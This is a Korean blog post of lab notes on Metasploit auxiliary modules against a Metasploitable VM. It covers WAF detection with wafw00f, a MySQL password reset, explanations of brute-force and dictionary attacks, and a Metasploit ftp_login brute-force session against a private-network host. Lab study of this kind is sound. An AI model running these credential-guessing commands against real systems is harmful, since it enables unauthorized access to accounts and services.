Notice
Recent Posts
Recent Comments
Link
«   2025/06   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30
Tags more
Archives
Today
Total
관리 메뉴

인프라

MSF 보조 기능 본문

Network

MSF 보조 기능

delay_year 2022. 11. 4. 09:45

 

 

 

웹 방화벽의 존재를 탐지하는 wafw00f 

NO WAF detected ~  : 방화벽이 없음

 

 

 

 

vi password.txt

패스워드 파일 작성

 

 

 

 

인터넷 연결 확인

 

 

mysql에서 NO database selected ERROR 해결법

ERROR 1046 (3D000): No database selected
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)


mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

 

무차별 대입 공격

 

무차별 대입Brute Force 공격이란 특정한 비밀번호를 해독하기 위해 사용 가능한 모든 값을 임의대로 조합해 순차적으로 대입하는 공격을 의미한다.

 

mysql> UPDATE user SET password = PASSWORD('1234') WHERE user = 'root' AND host = '%';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.00 sec)


mysql> exit
Bye

msfadmin@metasploitable:~$ mysql -u root -p1234
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

msfadmin@metasploitable:/var/www/dvwa/config$ sudo vi config.inc.php

 

연결 확인

id : admin

pw: password  ---> 접속 확인

 

 

 

무차별 대입 공격이 무의미한 조합으로 수행하는 공격이라고 한다면

사전 기반Dictionary 공격은 영어 사전에 나온 단어를 이용한 공격이다.

 

 

 

사전 기반Dictionary 공격

 

ls /usr/share/metasploit-framework/data/wordlists

# vi user.txt 

 

 

 

 

 

비밀번호 설정 다시 - 비번 1234

 

 

 

SMB

mysql

postgres

-------------------

FTP

ssh

telnet

 

 

 

 

FTP 공격

msf6 > use auxiliary/scanner/ftp/ftp_login

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTs 192.168.0.244
RHOSTs => 192.168.0.244
msf6 auxiliary(scanner/ftp/ftp_login) > set threads 256
threads => 256
msf6 auxiliary(scanner/ftp/ftp_login) > set user_file users.txt
user_file => users.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set pass_file password.txt
pass_file => passwords.txt
[-] Unknown datastore option: stop_on_sucess. Did you mean STOP_ON_SUCCESS?
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS false
STOP_ON_SUCCESS => false
msf6 auxiliary(scanner/ftp/ftp_login) > run

결과- ->

'Network' 카테고리의 다른 글

DVWA - XSS (Cross site scripting)  (0) 2022.11.14
hydra 히드라  (0) 2022.11.07
메타스플로잇 Metasploit  (0) 2022.11.03
프레임 릴레이  (0) 2022.10.11
OSPF 설정  (0) 2022.10.07
'Network' Related Articles more
Comments